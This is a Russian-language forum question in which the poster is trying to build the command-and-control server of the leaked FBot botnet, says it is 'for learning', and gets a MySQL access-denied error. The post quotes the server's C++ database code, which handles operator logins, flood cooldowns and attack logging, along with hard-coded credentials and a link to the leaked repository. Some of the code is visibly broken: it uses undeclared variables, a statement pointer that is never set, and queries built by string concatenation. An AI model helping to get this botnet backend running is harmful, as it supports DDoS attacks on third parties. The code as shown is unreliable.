# FBot ошибка с подключением MySQL

Tags: c++, mysql

При попытке собрать cnc у ботнета FBot (Для процесса обучения) произошёл:

> Started. terminate called after throwing an instance of 'sql::SQLException'
>
> what():  Access denied for user 'ilnar'@'localhost' (using password: YES)
>
> Aborted

```
#pragma once

#include <string>

#include <cppconn/driver.h>
#include <cppconn/exception.h>
#include <cppconn/resultset.h>
#include <cppconn/statement.h>

struct admin
{
    char *user_ptr;
    char *pass_ptr;
    std::string username;
    std::string password;
    int fd;
    int max_clients;
    int max_time;
    int cooldown;
    int concurrent;
    int disable;
    int admin;
    int authenticated;
};



#define MYSQL_HOST "0.0.0.0"
#define MYSQL_USERNAME "root"
#define MYSQL_PASSWORD "ilnar708"
#define MYSQL_DATABASE "botnet"
```

Пороли от баз полностью правильные. Однако он не подключается к базе данных.
Может быть это связано с тем, что cnc на wsl. А база на windows?

Вот github от Fbot (leaked): https://github.com/rawbypa/FBot/tree/main (Может определить  как вирус)

edit: mysql.cpp

```
#include <iostream>
#include <string.h>
#include <string>
#include <sstream>
#include <time.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <iostream>
#include "mysql.h"
#include "main.h"
#include "command.h"

using namespace std;

int mysql_login(struct admin *login)
{
    cout << "Structing MySql Data.";
    sql::Driver *driver;
    sql::Connection *connection;
    sql::Statement *statement;
    sql::ResultSet *result;
    char ret = FALSE;

    driver = get_driver_instance();
    connection = driver->connect(MYSQL_HOST, MYSQL_USERNAME, MYSQL_PASSWORD);
    connection->setSchema(MYSQL_DATABASE);

    statement = connection->createStatement();
    result = statement->executeQuery("SELECT username,password FROM users");

    while(result->next())
    {
        std::string u;
        std::string p;

        u = result->getString("username");
        p = result->getString("password");

        // Compare the pair and store
        if(strcasestr(login->user_ptr, u.c_str()) && (strcasestr(login->pass_ptr, p.c_str())))
        {
            login->username = u.c_str();
            login->password = p.c_str();
            ret = TRUE;
            break;
        }
    }

    delete result;
    delete statement;
    delete connection;

    return ret;
}

void mysql_set_restrictions(struct admin *login)
{

    query << "SELECT * FROM users WHERE username=\"";
    query << login->username;
    query << "\"";               MYSQL_HOST  MYSQL_USERNAME  MYSQL_PASSWORD
    std::stringstream query;
    statement = connection->createStatement();
    result = statement->executeQuery(query.str().c_str());

    while(result->next())
    {
        login->max_clients = result->getInt("max_clients");
        login->max_time = result->getInt("max_time");
        login->cooldown = result->getInt("cooldown");
        login->concurrent = result->getInt("concurrent");
        login->disable = result->getInt("disable");
        login->admin = result->getInt("admin");
        login->authenticated = result->getInt("authenticated");
    }

    delete result;
    delete statement;
    delete connection;

    return;
}

void mysql_update_login(struct admin *login, int authenticated)
{
    sql::Driver *driver;
    sql::Connection *connection;
    sql::Statement *statement;
    sql::ResultSet *result;
    std::stringstream query;

    driver = get_driver_instance();
    
    connection = driver->connect(MYSQL_HOST, MYSQL_USERNAME, MYSQL_PASSWORD);
    connection->setSchema(MYSQL_DATABASE);

    query << "UPDATE users SET authenticated=" << authenticated << " ";
    query << "WHERE username=\"";
    query << login->username;
    query << "\"";
                                   
    statement->execute(query.str().c_str());

    delete statement;
    delete connection;

    return;
}

int mysql_allow_concurrent(int fd, std::string username, uint16_t t, int concurrent, int cooldown)
{
    sql::Driver *driver;
    sql::Connection *connection;
    sql::Statement *statement;
    sql::ResultSet *result;
    std::stringstream query_stream;
    std::stringstream fail_stream;
    int ti = 0;
    int ttl = 0;

    if(concurrent)
        return FALSE;

    driver = get_driver_instance();
    connection = driver->connect(MYSQL_HOST, MYSQL_USERNAME, MYSQL_PASSWORD);
    connection->setSchema(MYSQL_DATABASE);

    query_stream << "SELECT timestamp, time FROM log WHERE username=\"";
    query_stream << username;
    query_stream << "\" AND (timestamp + " << t << " + " << cooldown << ") > UNIX_TIMESTAMP()";

    statement = connection->createStatement();
    result = statement->executeQuery(query_stream.str().c_str());
    
    if(!result->rowsCount())
    {
        delete result;
        delete statement;
        delete connection;
        return FALSE;
    }

    while(result->next())
    {
        ti = result->getInt("timestamp");
    }
    
    ttl = (ti + t + cooldown) - time(NULL);

    fail_stream << "Please wait " << ttl << " seconds before launching another command\r\n";
    send(fd, fail_stream.str().c_str(), fail_stream.str().length(), MSG_NOSIGNAL);

    delete result;
    delete statement;
    delete connection;
    return TRUE;
}

void mysql_log(std::string username, int count, std::string flood, std::string target, uint16_t t)
{
    sql::Driver *driver;
    sql::Connection *connection;
    sql::Statement *statement;
    sql::ResultSet *result;
    std::stringstream query_stream;

    driver = get_driver_instance();
    connection = driver->connect(MYSQL_HOST, MYSQL_USERNAME, MYSQL_PASSWORD);
    connection->setSchema(MYSQL_DATABASE);

    // Build the query for log
    query_stream << "INSERT INTO log VALUES(NULL, \"";
    query_stream << username;
    query_stream << "\", \"";
    query_stream << flood;
    query_stream << "\", \"";
    query_stream << target;
    query_stream << "\", ";
    query_stream << (!t ? 60 : t);
    query_stream << ", ";
    query_stream << (count == -1 ? client_count(count) : count);
    query_stream << ", " << time(NULL) << ")";

    statement = connection->createStatement();
    statement->execute(query_stream.str().c_str());

    delete statement;
    delete connection;
}

void mysql_clear_login(void)
{
    sql::Driver *driver;
    sql::Connection *connection;
    sql::Statement *statement;
    sql::ResultSet *result;

    driver = get_driver_instance();
    connection = driver->connect(MYSQL_HOST, MYSQL_USERNAME, MYSQL_PASSWORD);
    connection->setSchema(MYSQL_DATABASE);

    statement = connection->createStatement();
    statement->execute("UPDATE users SET authenticated=0 WHERE authenticated=1");

    delete statement;
    delete connection;

    return;
}
```